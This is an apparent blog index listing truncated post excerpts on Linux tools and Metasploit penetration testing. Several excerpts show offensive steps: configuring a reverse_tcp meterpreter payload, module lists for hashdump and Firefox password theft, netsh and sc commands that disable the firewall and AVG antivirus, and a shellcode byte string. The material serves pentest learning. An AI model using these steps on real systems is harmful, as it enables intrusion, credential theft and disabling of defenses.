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原创 mac address spoofing

How to hidden mac address ?Research Platform: Arch Linux x64step by steproot:notfound/ # pacman -S macchangerroot:notfound/ # macchanger -r enp0s25root:notfound/ # dhclient enp0s25make macspoof as

2015-04-29 23:35:41 997

原创 cheat

We can get some cheat sheets with cheat command.Install cheatgem install cheatCheat Usagecheat [programname]$ cheat gitgit: Setup ----- git clone <repo> clone the repository specified by <repo

2015-04-28 18:33:26 571

原创 gollum -- A wiki built on top of Git

Gollum supports a variety of formats and extensions (Markdown, MediaWiki, Textile, …). On top of these formats Gollum lets you insert headers, footers, links, image, math and more.Install$ [sudo] gem i

2015-04-28 11:08:45 1311

转载 Metasploit - Common Metasploit Module Coding Mistakes

This is a collection of all the bad code we often see in Metasploit modules. You should avoid them, too.Note: Some of these examples use puts() for demo purposes, but you should always use print_status

2015-04-27 21:22:05 660

原创 keybase

Install KeybaseKeybase is a website, but it’s also an open source command line program. Let’s walk through a terminal example, which illustrates what Keybase does. All of this can be embedded into othe

2015-04-27 20:24:58 1948

原创 linux - nfspy

Today, we will learn a nfs client called “nfspy” or “nfspysh”non root user$ rpcinfo -p program vers proto port 100000 4 tcp 111 portmapper 100000 3 tcp 111

2015-04-22 15:28:05 1313

原创 linux - rsync

If the host computer is not running SSH (or RSH), we can configure and run rsync as a daemon in this computer. This would have rsync listening to the port 873 for incoming connections from other comput

2015-04-22 11:27:57 1148

原创 metasploit - java meterpreter

msf > use payload/java/meterpreter/reverse_tcpmsf payload(reverse_tcp) > show options Module options (payload/java/meterpreter/reverse_tcp): Name Current Setting Required Description ---- -

2015-04-21 21:52:23 1787

原创 metasploit - meterpreter commands (linux)

meterpreter > helpCore Commands============= Command Description ------- ----------- ? Help menu background Ba

2015-04-21 09:04:47 969

原创 metasploit - meterpreter commands (windows)

meterpreter > helpCore Commands============= Command Description ------- ----------- ? Help menu background Ba

2015-04-21 08:48:40 760

转载 metasploit - meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a c

2015-04-21 08:21:49 656

原创 metasploit - nops

msf > use nop/use nop/armle/simple use nop/sparc/random use nop/x86/opty2use nop/php/generic use nop/tty/generic use nop/x86/single_byteuse nop/ppc/simple use nop/x64/simple

2015-04-20 13:55:08 939

原创 metasploit - plugins

msf > load load alias load msfd load socket_loggerload auto_add_route load msgrpc load soundsload db_credcollect load nessus load sqlmapload db_tracker

2015-04-20 13:53:58 657

原创 metasploit - encoders

msf > use encoder/use encoder/cmd/echouse encoder/cmd/generic_shuse encoder/cmd/ifsuse encoder/cmd/perluse encoder/cmd/powershell_base64use encoder/cmd/printf_php_mquse encoder/generic/eicaruse

2015-04-20 13:52:24 916

原创 metasploit - post

msf > use post/use post/aix/hashdumpuse post/cisco/gather/enum_ciscouse post/firefox/gather/cookiesuse post/firefox/gather/historyuse post/firefox/gather/passwordsuse post/firefox/gather/xssuse

2015-04-20 13:48:14 1848

原创 metasploit - exploits

msf >use exploits/use exploit/aix/rpc_cmsd_opcode21use exploit/aix/rpc_ttdbserverd_realpathuse exploit/android/browser/samsung_knox_smdm_urluse exploit/android/browser/webview_addjavascriptinterfac

2015-04-20 13:45:08 45011

原创 metasploit - auxiliary

msf >use auxiliarys/use auxiliary/admin/android/google_play_store_uxss_xframe_rceuse auxiliary/admin/appletv/appletv_display_imageuse auxiliary/admin/appletv/appletv_display_videouse auxiliary/admi

2015-04-20 12:19:31 6011

原创 windows command shell download file

[Platform]: windows 2008 x64 standardHow to download a file with windows command shell ?Method 1' Set your settings strFileURL = "http://www.it1.net/images/it1_logo2.jp

2015-04-19 17:50:14 1204

原创 metasploit - [post/windows/manage/payload_inject] and [multi_meter_inject]

During pentesting, we need spawn a new metrepter session sometines. Now we will learn post/windows/manage/payload_inject and multi_meter_inject. Set up a meterpreter listenerFirst, we need a meterpret

2015-04-19 12:05:01 1436

原创 metasploit - killav - netsh

Demo - kill avg# disable windows firewallnetsh firewall show opmode netsh firewall set opmode mode= DISABLE# query service avgwd configurationsc queryex avgwd# disable sc config avgwd start= disabl

2015-04-11 13:09:43 1119

原创 Metasploit - cpassword_decrypt

Description## This script will allow you to specify an encrypted cpassword string using the Microsofts public# AES key. This is useful if you don't or can't use the GPP post exploitation module. Jus

2015-04-08 22:48:11 1641

原创 metasploit - committer

Good man here ![nixawk@core tools]$ ./committer_count.rb -hCommits since 0000-01-01--------------------------------------------------hmoore-r7 4340wchen-r7 3969jva

2015-04-08 22:30:13 3224

原创 shellcode - Python vs Perl

What’s the difference between Python and Perl ? Using perl to write shellcode into a file[exploit@localhost Overflow]$ perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x

2015-04-03 15:25:27 842



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